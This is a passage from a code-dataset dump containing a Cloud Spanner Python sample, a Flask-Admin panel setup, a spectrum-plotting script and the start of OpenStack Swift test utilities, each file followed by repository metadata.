        instance_id, database_id, start_title='Aardvark', end_title='Goo'):
    """Queries sample data from the database using SQL and an index.

    The index must exist before running this sample. You can add the index
    by running the `add_index` sample or by running this DDL statement
    against your database:

        CREATE INDEX AlbumsByAlbumTitle ON Albums(AlbumTitle)

    This sample also uses the `MarketingBudget` column. You can add the
    column by running the `add_column` sample or by running this DDL
    statement against your database:

        ALTER TABLE Albums ADD COLUMN MarketingBudget INT64
    """
    from google.cloud.proto.spanner.v1 import type_pb2

    database = spanner.Client().instance(instance_id).database(database_id)

    # Bind the range bounds as typed query parameters rather than
    # interpolating them into the SQL text.
    query_params = {
        'start_title': start_title,
        'end_title': end_title
    }
    query_param_types = {
        'start_title': type_pb2.Type(code=type_pb2.STRING),
        'end_title': type_pb2.Type(code=type_pb2.STRING)
    }

    rows = database.execute_sql(
        "SELECT AlbumId, AlbumTitle, MarketingBudget "
        "FROM Albums@{FORCE_INDEX=AlbumsByAlbumTitle} "
        "WHERE AlbumTitle >= @start_title AND AlbumTitle < @end_title",
        params=query_params, param_types=query_param_types)

    for row in rows:
        print(
            u'AlbumId: {}, AlbumTitle: {}, '
            'MarketingBudget: {}'.format(*row))
def read_data_with_index(instance_id, database_id):
    """Reads sample data from the database using an index.

    The index must exist before running this sample. You can add the index
    by running the `add_index` sample or by running this DDL statement
    against your database:

        CREATE INDEX AlbumsByAlbumTitle ON Albums(AlbumTitle)
    """
    database = spanner.Client().instance(instance_id).database(database_id)

    rows = database.read(
        table='Albums',
        columns=('AlbumId', 'AlbumTitle'),
        keyset=spanner.KeySet(all_=True),
        index='AlbumsByAlbumTitle')
    for row in rows:
        print('AlbumId: {}, AlbumTitle: {}'.format(*row))
def add_storing_index(instance_id, database_id):
    """Adds a storing index to the example database.

    The index covers `MarketingBudget` via a STORING clause so reads using
    the index can return that column without a table lookup.
    """
    spanner_client = spanner.Client()
    instance = spanner_client.instance(instance_id)
    database = instance.database(database_id)

    # Bug fix: the two adjacent string literals previously concatenated to
    # "...(AlbumTitle)STORING (MarketingBudget)" — no space before STORING,
    # which is invalid DDL. Keep the implicit concatenation but add the
    # missing space.
    operation = database.update_ddl([
        'CREATE INDEX AlbumsByAlbumTitle2 ON Albums(AlbumTitle) '
        'STORING (MarketingBudget)'])

    # update_ddl is asynchronous; block until the schema change lands.
    print('Waiting for operation to complete...')
    operation.result()

    print('Added the AlbumsByAlbumTitle2 index.')
def read_data_with_storing_index(instance_id, database_id):
    """Reads sample data from the database using an index with a storing
    clause.

    The index must exist before running this sample. You can add the index
    by running the `add_storing_index` sample or by running this DDL
    statement against your database:

        CREATE INDEX AlbumsByAlbumTitle2 ON Albums(AlbumTitle)
        STORING (MarketingBudget)
    """
    database = spanner.Client().instance(instance_id).database(database_id)

    rows = database.read(
        table='Albums',
        columns=('AlbumId', 'AlbumTitle', 'MarketingBudget'),
        keyset=spanner.KeySet(all_=True),
        index='AlbumsByAlbumTitle2')
    for row in rows:
        print(
            u'AlbumId: {}, AlbumTitle: {}, '
            'MarketingBudget: {}'.format(*row))
def add_column(instance_id, database_id):
    """Adds a new column to the Albums table in the example database."""
    database = spanner.Client().instance(instance_id).database(database_id)

    operation = database.update_ddl([
        'ALTER TABLE Albums ADD COLUMN MarketingBudget INT64'])

    # update_ddl is asynchronous; block until the schema change lands.
    print('Waiting for operation to complete...')
    operation.result()

    print('Added the MarketingBudget column.')
def update_data(instance_id, database_id):
    """Updates sample data in the database.

    This updates the `MarketingBudget` column which must be created before
    running this sample. You can add the column by running the `add_column`
    sample or by running this DDL statement against your database:

        ALTER TABLE Albums ADD COLUMN MarketingBudget INT64
    """
    database = spanner.Client().instance(instance_id).database(database_id)

    budget_rows = [
        (1, 1, 100000),
        (2, 2, 500000)]

    # The batch applies the updates atomically on context exit.
    with database.batch() as batch:
        batch.update(
            table='Albums',
            columns=(
                'SingerId', 'AlbumId', 'MarketingBudget'),
            values=budget_rows)

    print('Updated data.')
def read_write_transaction(instance_id, database_id):
    """Performs a read-write transaction to update two sample records in the
    database.

    This will transfer 200,000 from the `MarketingBudget` field for the second
    Album to the first Album. If the `MarketingBudget` is too low, it will
    raise an exception.

    Before running this sample, you will need to run the `update_data` sample
    to populate the fields.
    """
    spanner_client = spanner.Client()
    instance = spanner_client.instance(instance_id)
    database = instance.database(database_id)

    def update_albums(transaction):
        # Runs inside run_in_transaction and may be retried on transaction
        # aborts, so it must be safe to re-execute from scratch.
        # Read the second album budget.
        second_album_keyset = spanner.KeySet(keys=[(2, 2)])
        second_album_result = transaction.read(
            table='Albums', columns=('MarketingBudget',),
            keyset=second_album_keyset, limit=1)
        second_album_row = list(second_album_result)[0]
        second_album_budget = second_album_row[0]

        transfer_amount = 200000

        if second_album_budget < 300000:
            # Raising an exception will automatically roll back the
            # transaction.
            raise ValueError(
                'The second album doesn\'t have enough funds to transfer')

        # Read the first album's budget.
        first_album_keyset = spanner.KeySet(keys=[(1, 1)])
        first_album_result = transaction.read(
            table='Albums', columns=('MarketingBudget',),
            keyset=first_album_keyset, limit=1)
        first_album_row = list(first_album_result)[0]
        first_album_budget = first_album_row[0]

        # Update the budgets.
        second_album_budget -= transfer_amount
        first_album_budget += transfer_amount
        print(
            'Setting first album\'s budget to {} and the second album\'s '
            'budget to {}.'.format(
                first_album_budget, second_album_budget))

        # Update the rows.
        transaction.update(
            table='Albums',
            columns=(
                'SingerId', 'AlbumId', 'MarketingBudget'),
            values=[
                (1, 1, first_album_budget),
                (2, 2, second_album_budget)])

    database.run_in_transaction(update_albums)

    print('Transaction complete.')
def read_only_transaction(instance_id, database_id):
    """Reads data inside of a read-only transaction.

    Within the read-only transaction, or "snapshot", the application sees
    consistent view of the database at a particular timestamp.
    """
    database = spanner.Client().instance(instance_id).database(database_id)

    with database.snapshot() as snapshot:
        # Read using SQL.
        sql_rows = snapshot.execute_sql(
            'SELECT SingerId, AlbumId, AlbumTitle FROM Albums')

        print('Results from first read:')
        for row in sql_rows:
            print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))

        # Perform another read using the `read` method. Even if the data
        # is updated in-between the reads, the snapshot ensures that both
        # return the same data.
        read_rows = snapshot.read(
            table='Albums',
            columns=('SingerId', 'AlbumId', 'AlbumTitle',),
            keyset=spanner.KeySet(all_=True),)

        print('Results from second read:')
        for row in read_rows:
            print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))
if __name__ == '__main__':
    # Command-line entry point: one subcommand per sample function.
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument(
        'instance_id', help='Your Cloud Spanner instance ID.')
    parser.add_argument(
        '--database-id', help='Your Cloud Spanner database ID.',
        default='example_db')

    subparsers = parser.add_subparsers(dest='command')
    subparsers.add_parser('create_database', help=create_database.__doc__)
    subparsers.add_parser('insert_data', help=insert_data.__doc__)
    subparsers.add_parser('query_data', help=query_data.__doc__)
    subparsers.add_parser('read_data', help=read_data.__doc__)
    subparsers.add_parser('add_column', help=add_column.__doc__)
    subparsers.add_parser('update_data', help=update_data.__doc__)
    subparsers.add_parser(
        'query_data_with_new_column', help=query_data_with_new_column.__doc__)
    subparsers.add_parser(
        'read_write_transaction', help=read_write_transaction.__doc__)
    subparsers.add_parser(
        'read_only_transaction', help=read_only_transaction.__doc__)
    subparsers.add_parser('add_index', help=add_index.__doc__)
    query_data_with_index_parser = subparsers.add_parser(
        'query_data_with_index', help=query_data_with_index.__doc__)
    query_data_with_index_parser.add_argument(
        '--start_title', default='Aardvark')
    query_data_with_index_parser.add_argument(
        '--end_title', default='Goo')
    # Bug fix: 'read_data_with_index' and 'read_data_with_storing_index'
    # previously showed insert_data's docstring in --help; point them at
    # their own functions.
    subparsers.add_parser(
        'read_data_with_index', help=read_data_with_index.__doc__)
    subparsers.add_parser('add_storing_index', help=add_storing_index.__doc__)
    subparsers.add_parser(
        'read_data_with_storing_index',
        help=read_data_with_storing_index.__doc__)

    args = parser.parse_args()

    if args.command == 'create_database':
        create_database(args.instance_id, args.database_id)
    elif args.command == 'insert_data':
        insert_data(args.instance_id, args.database_id)
    elif args.command == 'query_data':
        query_data(args.instance_id, args.database_id)
    elif args.command == 'read_data':
        read_data(args.instance_id, args.database_id)
    elif args.command == 'add_column':
        add_column(args.instance_id, args.database_id)
    elif args.command == 'update_data':
        update_data(args.instance_id, args.database_id)
    elif args.command == 'query_data_with_new_column':
        query_data_with_new_column(args.instance_id, args.database_id)
    elif args.command == 'read_write_transaction':
        read_write_transaction(args.instance_id, args.database_id)
    elif args.command == 'read_only_transaction':
        read_only_transaction(args.instance_id, args.database_id)
    elif args.command == 'add_index':
        add_index(args.instance_id, args.database_id)
    elif args.command == 'query_data_with_index':
        query_data_with_index(
            args.instance_id, args.database_id,
            args.start_title, args.end_title)
    elif args.command == 'read_data_with_index':
        read_data_with_index(args.instance_id, args.database_id)
    elif args.command == 'add_storing_index':
        add_storing_index(args.instance_id, args.database_id)
    elif args.command == 'read_data_with_storing_index':
        read_data_with_storing_index(args.instance_id, args.database_id)
    else:
        # No subcommand given: show usage instead of silently exiting.
        parser.print_help()
| 35.473461
| 79
| 0.672253
|
4a07e0e40f46587fd9d86ecaa7cfd6a18e85c85d
| 467
|
py
|
Python
|
modules/app/admin/admin.py
|
uwrit/kpmp-user-portal
|
d20ce6290a0ad64f63a6f043bf6ff061b4968953
|
[
"BSD-3-Clause"
] | 1
|
2019-05-01T00:43:59.000Z
|
2019-05-01T00:43:59.000Z
|
modules/app/admin/admin.py
|
uwrit/kpmp-user-portal
|
d20ce6290a0ad64f63a6f043bf6ff061b4968953
|
[
"BSD-3-Clause"
] | 7
|
2019-03-17T02:19:21.000Z
|
2019-03-29T15:11:53.000Z
|
modules/app/admin/admin.py
|
uwrit/kpmp_user_portal
|
d20ce6290a0ad64f63a6f043bf6ff061b4968953
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_admin import Admin
from modules.app import mongo, app
from .user import UserView
from .client import ClientView
from .org import OrganizationView
from .group import GroupView
# Flask-Admin panel wiring: one ModelView per Mongo collection.  The order
# of the add_view calls determines the menu order in the admin UI.
admin = Admin(app, name='KPMP User Portal Admin Panel')
admin.add_view(UserView(mongo.db.users, 'Users'))
admin.add_view(OrganizationView(mongo.db.orgs, 'Organizations'))
admin.add_view(GroupView(mongo.db.groups, 'Groups'))
admin.add_view(ClientView(mongo.db.clients, 'Clients'))
| 35.923077
| 64
| 0.796574
|
4a07e0f35ede05e1e3742646f24f0e40ebee555f
| 2,041
|
py
|
Python
|
Analysis/Plot_Spect.py
|
ry-dgel/self-phase
|
d55167d4ed5430cde52fa54b738d5b209a44582c
|
[
"MIT"
] | null | null | null |
Analysis/Plot_Spect.py
|
ry-dgel/self-phase
|
d55167d4ed5430cde52fa54b738d5b209a44582c
|
[
"MIT"
] | null | null | null |
Analysis/Plot_Spect.py
|
ry-dgel/self-phase
|
d55167d4ed5430cde52fa54b738d5b209a44582c
|
[
"MIT"
] | null | null | null |
import sys
from itertools import groupby
import yaml
import matplotlib
from matplotlib import pyplot as plt
import numpy as np
# Global plot font settings.
# NOTE(review): 'normal' is not a valid matplotlib font family name — it
# warns and falls back to the default; confirm whether a family was intended.
font = {'family' : 'normal',
        'size'   : 22}
matplotlib.rc('font', **font)

# Planck constant (J*s) times the J->eV conversion factor: multiplying a
# frequency in Hz by cf yields the photon energy in eV.
cf = 6.626e-34 * 6.242e18
def norm_spectrum(data_set):
    """Return the magnitude spectrum of a complex field, scaled to peak 1.

    *data_set* is an (N, 2) array whose columns hold the real and imaginary
    parts of the time-domain field.
    """
    real_part, imag_part = data_set.T
    field = real_part + imag_part * 1j
    # fftshift on both sides keeps the zero-frequency bin centered.
    spectrum = np.fft.fftshift(np.fft.fft(np.fft.fftshift(field)))
    magnitude = np.sqrt(np.power(np.real(spectrum), 2) +
                        np.power(np.imag(spectrum), 2))
    return magnitude / magnitude.max()
# Input directory is the first CLI argument; it must contain the files
# "E" (field snapshots) and "params" (YAML simulation parameters).
folder = sys.argv[1]

data_list = [] # Initialize array of datasets. Each element is a time step.
with open(folder + "/E") as f:
    # Split datafile into sections separated by empty lines
    for k, g in groupby(f, lambda x: x == "\n"):
        if not k:
            # Split line of data after comma, striping whitespace.
            data_list.append(np.array([[float(x) for x in d.split(',')]
                                       for d in g if len(d.strip())]))

# NOTE(review): yaml.load without an explicit Loader is unsafe on untrusted
# input and deprecated since PyYAML 5.1; yaml.safe_load would suffice here.
with open(folder + "/params") as f:
    p = yaml.load(f)
    # All parameter values are used numerically below.
    for key, val in p.items():
        p[key] = float(val)

# y axis
dt = p["tmax"]/(p["Nt"]-1) # Time step
points = np.arange(-p["Nt"]/2,p["Nt"]/2+1,1)
t = points*dt # Time grid iterator
f = points/p["tmax"] # Frequency grid 0 centered
f = f + 299792458/p["lambda"]  # shift to absolute frequency around the carrier
g = f[np.where(f > 0)]  # keep only physical (positive) frequencies
ev = g * cf  # photon energy in eV
wl = 1239.84193/ev  # wavelength in nm (hc = 1239.84193 eV*nm)

X, Y = np.meshgrid(np.linspace(0,2.5, len(data_list)), wl[wl < 1200])
# frequency axis

# Initialize figure
data_list = [norm_spectrum(data_set) for data_set in data_list]
data_list = [spectrum[np.where(f>0)] for spectrum in data_list]
data_list = [spectrum[np.where(wl<1200)] for spectrum in data_list]
# Jacobian-style factor converting the frequency-domain spectrum into a
# wavelength-domain one.
data_list = [spectrum * np.power(ev[np.where(wl<1200)],2)/1239.84193 for spectrum in data_list]
spectra = np.array([[spectrum] for spectrum in data_list])[:,0,:]

fig, ax = plt.subplots(1)
plt.pcolormesh(X, Y, spectra.T, figure=fig, cmap="plasma")
ax.set_ylim(564,1130)
#ax.set_ylim(500,1100)
ax.set_xlabel("Propagation Length (m)")
ax.set_ylabel("Wavelength (nm)")
plt.show()
| 31.890625
| 95
| 0.631063
|
4a07e176d7a518415f0fdc673f4a603df30b77c5
| 33,048
|
py
|
Python
|
test/unit/__init__.py
|
hbhdytf/mac
|
51252356b22a792599a401f40ede0b9fda9fccdc
|
[
"Apache-2.0"
] | null | null | null |
test/unit/__init__.py
|
hbhdytf/mac
|
51252356b22a792599a401f40ede0b9fda9fccdc
|
[
"Apache-2.0"
] | null | null | null |
test/unit/__init__.py
|
hbhdytf/mac
|
51252356b22a792599a401f40ede0b9fda9fccdc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Swift tests """
from __future__ import print_function
import os
import copy
import logging
import errno
from six.moves import range
import sys
from contextlib import contextmanager, closing
from collections import defaultdict, Iterable
import itertools
from numbers import Number
from tempfile import NamedTemporaryFile
import time
import eventlet
from eventlet.green import socket
from tempfile import mkdtemp
from shutil import rmtree
from swift.common.utils import Timestamp, NOTICE
from test import get_config
from swift.common import swob, utils
from swift.common.ring import Ring, RingData
from hashlib import md5
import logging.handlers
from six.moves.http_client import HTTPException
from swift.common import storage_policy
from swift.common.storage_policy import StoragePolicy, ECStoragePolicy
import functools
import six.moves.cPickle as pickle
from gzip import GzipFile
import mock as mocklib
import inspect
# MD5 of the empty string — the ETag Swift stores for zero-byte objects.
EMPTY_ETAG = md5().hexdigest()

# try not to import this module from swift
if not os.path.basename(sys.argv[0]).startswith('swift'):
    # never patch HASH_PATH_SUFFIX AGAIN!
    utils.HASH_PATH_SUFFIX = 'endcap'
def patch_policies(thing_or_policies=None, legacy_only=False,
                   with_ec_default=False, fake_ring_args=None):
    """Patch the global storage policy collection for a test.

    Usable three ways:

      * ``patch_policies(policies)`` with an explicit iterable/collection
        of policies returns a :class:`PatchPolicies` wrapper around them;
      * ``@patch_policies`` bare, or called with flags, decorates with a
        canned default set: ``legacy_only`` gives a single policy-0,
        ``with_ec_default`` gives an EC default plus one replicated policy,
        otherwise two replicated policies.
    """
    if isinstance(thing_or_policies, (
            Iterable, storage_policy.StoragePolicyCollection)):
        return PatchPolicies(thing_or_policies, fake_ring_args=fake_ring_args)

    if legacy_only:
        default_policies = [
            StoragePolicy(0, name='legacy', is_default=True),
        ]
        default_ring_args = [{}]
    elif with_ec_default:
        default_policies = [
            ECStoragePolicy(0, name='ec', is_default=True,
                            ec_type='jerasure_rs_vand', ec_ndata=10,
                            ec_nparity=4, ec_segment_size=4096),
            StoragePolicy(1, name='unu'),
        ]
        # EC policy wants ndata + nparity = 14 replicas in its fake ring.
        default_ring_args = [{'replicas': 14}, {}]
    else:
        default_policies = [
            StoragePolicy(0, name='nulo', is_default=True),
            StoragePolicy(1, name='unu'),
        ]
        default_ring_args = [{}, {}]

    fake_ring_args = fake_ring_args or default_ring_args
    decorator = PatchPolicies(default_policies, fake_ring_args=fake_ring_args)

    if not thing_or_policies:
        return decorator
    else:
        # it's a thing, we return the wrapped thing instead of the decorator
        return decorator(thing_or_policies)
class PatchPolicies(object):
    """
    Why not mock.patch? In my case, when used as a decorator on the class it
    seemed to patch setUp at the wrong time (i.e. in setup the global wasn't
    patched yet).

    Swaps ``storage_policy._POLICIES`` for the given collection around a
    test class, test method, or ``with`` block, restoring the original on
    the way out.
    """

    def __init__(self, policies, fake_ring_args=None):
        # Accept either a ready collection or a plain list of policies.
        if isinstance(policies, storage_policy.StoragePolicyCollection):
            self.policies = policies
        else:
            self.policies = storage_policy.StoragePolicyCollection(policies)
        # One (possibly None) FakeRing kwargs dict per policy.
        self.fake_ring_args = fake_ring_args or [None] * len(self.policies)

    def _setup_rings(self):
        """
        Our tests tend to use the policies rings like their own personal
        playground - which can be a problem in the particular case of a
        patched TestCase class where the FakeRing objects are scoped in the
        call to the patch_policies wrapper outside of the TestCase instance
        which can lead to some bled state.

        To help tests get better isolation without having to think about it,
        here we're capturing the args required to *build* a new FakeRing
        instances so we can ensure each test method gets a clean ring setup.

        The TestCase can always "tweak" these fresh rings in setUp - or if
        they'd prefer to get the same "reset" behavior with custom FakeRing's
        they can pass in their own fake_ring_args to patch_policies instead of
        setting the object_ring on the policy definitions.
        """
        for policy, fake_ring_arg in zip(self.policies, self.fake_ring_args):
            if fake_ring_arg is not None:
                policy.object_ring = FakeRing(**fake_ring_arg)

    def __call__(self, thing):
        # Class decoration patches setUp/tearDown; anything else is
        # treated as a callable and wrapped.
        if isinstance(thing, type):
            return self._patch_class(thing)
        else:
            return self._patch_method(thing)

    def _patch_class(self, cls):
        """
        Creating a new class that inherits from decorated class is the more
        common way I've seen class decorators done - but it seems to cause
        infinite recursion when super is called from inside methods in the
        decorated class.
        """
        orig_setUp = cls.setUp
        orig_tearDown = cls.tearDown

        def setUp(cls_self):
            # Save the global so tearDown can restore it; only patch once
            # per instance (setUp may be re-entered by subclasses).
            self._orig_POLICIES = storage_policy._POLICIES
            if not getattr(cls_self, '_policies_patched', False):
                storage_policy._POLICIES = self.policies
                self._setup_rings()
                cls_self._policies_patched = True

            orig_setUp(cls_self)

        def tearDown(cls_self):
            orig_tearDown(cls_self)
            storage_policy._POLICIES = self._orig_POLICIES

        cls.setUp = setUp
        cls.tearDown = tearDown

        return cls

    def _patch_method(self, f):
        @functools.wraps(f)
        def mywrapper(*args, **kwargs):
            self._orig_POLICIES = storage_policy._POLICIES
            try:
                storage_policy._POLICIES = self.policies
                self._setup_rings()
                return f(*args, **kwargs)
            finally:
                # Always restore the global, even if the test raised.
                storage_policy._POLICIES = self._orig_POLICIES

        return mywrapper

    def __enter__(self):
        self._orig_POLICIES = storage_policy._POLICIES
        storage_policy._POLICIES = self.policies

    def __exit__(self, *args):
        storage_policy._POLICIES = self._orig_POLICIES
class FakeRing(Ring):
    """A Ring whose device table is fabricated in memory for tests."""

    def __init__(self, replicas=3, max_more_nodes=0, part_power=0,
                 base_port=1000):
        """
        :param part_power: make part calculation based on the path

        If you set a part_power when you setup your FakeRing the parts you get
        out of ring methods will actually be based on the path - otherwise we
        exercise the real ring code, but ignore the result and return 1.
        """
        self._base_port = base_port
        self.max_more_nodes = max_more_nodes
        self._part_shift = 32 - part_power
        self.set_replicas(replicas)
        self._reload()

    def _reload(self):
        self._rtime = time.time()

    def set_replicas(self, replicas):
        """Rebuild the fake device list with one device per replica."""
        self.replicas = replicas
        devs = []
        for idx in range(replicas):
            node_ip = '10.0.0.%s' % idx
            node_port = self._base_port + idx
            devs.append({
                'ip': node_ip,
                'replication_ip': node_ip,
                'port': node_port,
                'replication_port': node_port,
                'device': 'sd' + (chr(ord('a') + idx)),
                'zone': idx % 3,
                'region': idx % 2,
                'id': idx,
            })
        self._devs = devs

    @property
    def replica_count(self):
        return self.replicas

    def _get_part_nodes(self, part):
        return [dict(node, index=i) for i, node in enumerate(list(self._devs))]

    def get_more_nodes(self, part):
        # Handout nodes beyond the primaries, capped by max_more_nodes.
        for idx in range(self.replicas, self.replicas + self.max_more_nodes):
            extra_ip = '10.0.0.%s' % idx
            yield {'ip': extra_ip,
                   'replication_ip': extra_ip,
                   'port': self._base_port + idx,
                   'replication_port': self._base_port + idx,
                   'device': 'sda',
                   'zone': idx % 3,
                   'region': idx % 2,
                   'id': idx}
def write_fake_ring(path, *devs):
    """
    Pretty much just a two node, two replica, 2 part power ring...

    Optional ``devs`` are two dicts of overrides merged into the default
    device entries before the gzipped pickle is written to *path*.
    """
    base_dev1 = {'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
                 'port': 6000}
    base_dev2 = {'id': 0, 'zone': 0, 'device': 'sdb1', 'ip': '127.0.0.1',
                 'port': 6000}

    overrides1, overrides2 = devs or ({}, {})
    base_dev1.update(overrides1)
    base_dev2.update(overrides2)

    replica2part2dev_id = [[0, 1, 0, 1], [1, 0, 1, 0]]
    ring_data = RingData(replica2part2dev_id, [base_dev1, base_dev2], 30)
    with closing(GzipFile(path, 'wb')) as f:
        pickle.dump(ring_data, f)
class FabricatedRing(Ring):
    """
    When a FakeRing just won't do - you can fabricate one to meet
    your tests needs.

    Builds a full replica2part2dev table by cycling device ids across
    all partitions.
    """

    def __init__(self, replicas=6, devices=8, nodes=4, port=6000,
                 part_power=4):
        """
        :param replicas: number of replica rows in the fabricated table
        :param devices: total number of devices, spread across *nodes*
        :param nodes: number of distinct node IPs
        :param port: port assigned to every device
        :param part_power: partition power of the fabricated ring
        """
        self.devices = devices
        self.nodes = nodes
        self.port = port
        # BUG FIX: was hard-coded ``self.replicas = 6``, which silently
        # ignored the ``replicas`` argument.
        self.replicas = replicas
        self.part_power = part_power
        self._part_shift = 32 - self.part_power
        self._reload()

    def _reload(self, *args, **kwargs):
        # rtime set in the future — presumably so the base Ring never
        # attempts a real on-disk reload; TODO confirm against Ring.
        self._rtime = time.time() * 2
        if hasattr(self, '_replica2part2dev_id'):
            return
        self._devs = [{
            'region': 1,
            'zone': 1,
            'weight': 1.0,
            'id': i,
            'device': 'sda%d' % i,
            'ip': '10.0.0.%d' % (i % self.nodes),
            'replication_ip': '10.0.0.%d' % (i % self.nodes),
            'port': self.port,
            'replication_port': self.port,
        } for i in range(self.devices)]

        self._replica2part2dev_id = [
            [None] * 2 ** self.part_power
            for i in range(self.replicas)
        ]
        # Round-robin device ids over every (replica, part) slot.
        dev_ids = itertools.cycle(range(self.devices))
        for p in range(2 ** self.part_power):
            for r in range(self.replicas):
                self._replica2part2dev_id[r][p] = next(dev_ids)
class FakeMemcache(object):
    """Minimal in-memory stand-in for a memcache client."""

    def __init__(self):
        self.store = {}

    def get(self, key):
        """Return the cached value for *key*, or None when absent."""
        return self.store.get(key)

    def keys(self):
        return self.store.keys()

    def set(self, key, value, time=0):
        """Store *value* under *key*; the *time* TTL is ignored."""
        self.store[key] = value
        return True

    def incr(self, key, time=0):
        """Increment *key* (starting from 0 if missing) and return it."""
        new_value = self.store.get(key, 0) + 1
        self.store[key] = new_value
        return new_value

    @contextmanager
    def soft_lock(self, key, timeout=0, retries=5):
        """No-op lock context: always yields True immediately."""
        yield True

    def delete(self, key):
        """Remove *key* if present; always report success."""
        self.store.pop(key, None)
        return True
def readuntil2crlfs(fd):
    """Read *fd* one char at a time until two consecutive CRLFs are seen.

    Returns everything read, including the terminating ``\\r\\n\\r\\n``;
    raises ValueError if the stream ends first.
    """
    collected = ''
    prev = ''
    pair_count = 0
    while pair_count < 2:
        ch = fd.read(1)
        if not ch:
            raise ValueError("didn't get two CRLFs; just got %r" % collected)
        collected += ch
        # A bare '\r' (not completing a prior CRLF) restarts the count.
        if ch == '\r' and prev != '\n':
            pair_count = 0
        if prev == '\r' and ch == '\n':
            pair_count += 1
        prev = ch
    return collected
def connect_tcp(hostport):
    """Open and return a TCP socket connected to the (host, port) tuple."""
    conn = socket.socket()
    conn.connect(hostport)
    return conn
@contextmanager
def tmpfile(content):
    """Yield the path of a temp file holding str(content); unlink on exit."""
    with NamedTemporaryFile('w', delete=False) as tmp:
        path = tmp.name
        tmp.write(str(content))
    try:
        yield path
    finally:
        os.unlink(path)
xattr_data = {}
def _get_inode(fd):
if not isinstance(fd, int):
try:
fd = fd.fileno()
except AttributeError:
return os.stat(fd).st_ino
return os.fstat(fd).st_ino
def _setxattr(fd, k, v):
inode = _get_inode(fd)
data = xattr_data.get(inode, {})
data[k] = v
xattr_data[inode] = data
def _getxattr(fd, k):
inode = _get_inode(fd)
data = xattr_data.get(inode, {}).get(k)
if not data:
raise IOError(errno.ENODATA, "Fake IOError")
return data
import xattr
xattr.setxattr = _setxattr
xattr.getxattr = _getxattr
@contextmanager
def temptree(files, contents=''):
    """Create a temp dir populated with *files*; yield its path, then rmtree.

    ``contents`` is spread element-wise over the files (padded with '').
    """
    count = len(files)
    padded = (list(contents) + [''] * count)[:count]
    root = mkdtemp()
    for rel_path, body in zip(files, padded):
        if os.path.isabs(rel_path):
            # Re-root absolute paths under the temp dir.
            rel_path = '.' + rel_path
        target = os.path.join(root, rel_path)
        parent = os.path.dirname(target)
        if not os.path.exists(parent):
            os.makedirs(parent)
        with open(target, 'w') as out:
            out.write(str(body))
    try:
        yield root
    finally:
        rmtree(root)
def with_tempdir(f):
    """
    Decorator to give a single test a tempdir as argument to test method.

    The tempdir is appended as the last positional argument and removed
    after the call, pass or fail.
    """
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        scratch = mkdtemp()
        try:
            return f(*(list(args) + [scratch]), **kwargs)
        finally:
            rmtree(scratch)
    return wrapped
class NullLoggingHandler(logging.Handler):
    """Logging handler that silently discards every record."""

    def emit(self, record):
        pass
class UnmockTimeModule(object):
    """
    Even if a test mocks time.time - you can restore unmolested behavior in
    another module that imports time directly by monkey patching its imported
    reference with an instance of this class.
    """

    # Captured at class-definition time, before any test mocks time.time.
    _orig_time = time.time

    def __getattribute__(self, name):
        if name != 'time':
            return getattr(time, name)
        return UnmockTimeModule._orig_time


# logging.LogRecord.__init__ calls time.time
logging.time = UnmockTimeModule()
class FakeLogger(logging.Logger, object):
    """Thread-safe fake Logger that records every call for assertions.

    Doubles as its own handler: captured lines live in ``lines_dict`` and
    raw call tuples in ``log_dict``.  StatsD-style methods are stubbed to
    record into ``log_dict`` as well.
    """
    # a thread safe fake logger

    def __init__(self, *args, **kwargs):
        self._clear()
        self.name = 'swift.unit.fake_logger'
        self.level = logging.NOTSET
        if 'facility' in kwargs:
            self.facility = kwargs['facility']
        self.statsd_client = None
        self.thread_locals = None
        self.parent = None

    # Maps a logging level to the log_dict bucket it is stored under.
    store_in = {
        logging.ERROR: 'error',
        logging.WARNING: 'warning',
        logging.INFO: 'info',
        logging.DEBUG: 'debug',
        logging.CRITICAL: 'critical',
        NOTICE: 'notice',
    }

    def notice(self, msg, *args, **kwargs):
        """
        Convenience function for syslog priority LOG_NOTICE. The python
        logging lvl is set to 25, just above info. SysLogHandler is
        monkey patched to map this log lvl to the LOG_NOTICE syslog
        priority.
        """
        self.log(NOTICE, msg, *args, **kwargs)

    def _log(self, level, msg, *args, **kwargs):
        # Record the raw call, then let the real Logger machinery run so
        # handle()/_handle() also capture the rendered line.
        store_name = self.store_in[level]
        cargs = [msg]
        if any(args):
            cargs.extend(args)
        captured = dict(kwargs)
        # exc_info=True (or similar) is resolved to the live exception tuple.
        if 'exc_info' in kwargs and \
                not isinstance(kwargs['exc_info'], tuple):
            captured['exc_info'] = sys.exc_info()
        self.log_dict[store_name].append((tuple(cargs), captured))
        super(FakeLogger, self)._log(level, msg, *args, **kwargs)

    def _clear(self):
        self.log_dict = defaultdict(list)
        self.lines_dict = {'critical': [], 'error': [], 'info': [],
                           'warning': [], 'debug': [], 'notice': []}

    clear = _clear  # this is a public interface

    def get_lines_for_level(self, level):
        if level not in self.lines_dict:
            raise KeyError(
                "Invalid log level '%s'; valid levels are %s" %
                (level,
                 ', '.join("'%s'" % lvl for lvl in sorted(self.lines_dict))))
        return self.lines_dict[level]

    def all_log_lines(self):
        # Only levels that actually captured something.
        return dict((level, msgs) for level, msgs in self.lines_dict.items()
                    if len(msgs) > 0)

    def _store_in(store_name):
        def stub_fn(self, *args, **kwargs):
            self.log_dict[store_name].append((args, kwargs))
        return stub_fn

    # mock out the StatsD logging methods:
    update_stats = _store_in('update_stats')
    increment = _store_in('increment')
    decrement = _store_in('decrement')
    timing = _store_in('timing')
    timing_since = _store_in('timing_since')
    transfer_rate = _store_in('transfer_rate')
    set_statsd_prefix = _store_in('set_statsd_prefix')

    def get_increments(self):
        return [call[0][0] for call in self.log_dict['increment']]

    def get_increment_counts(self):
        counts = {}
        for metric in self.get_increments():
            if metric not in counts:
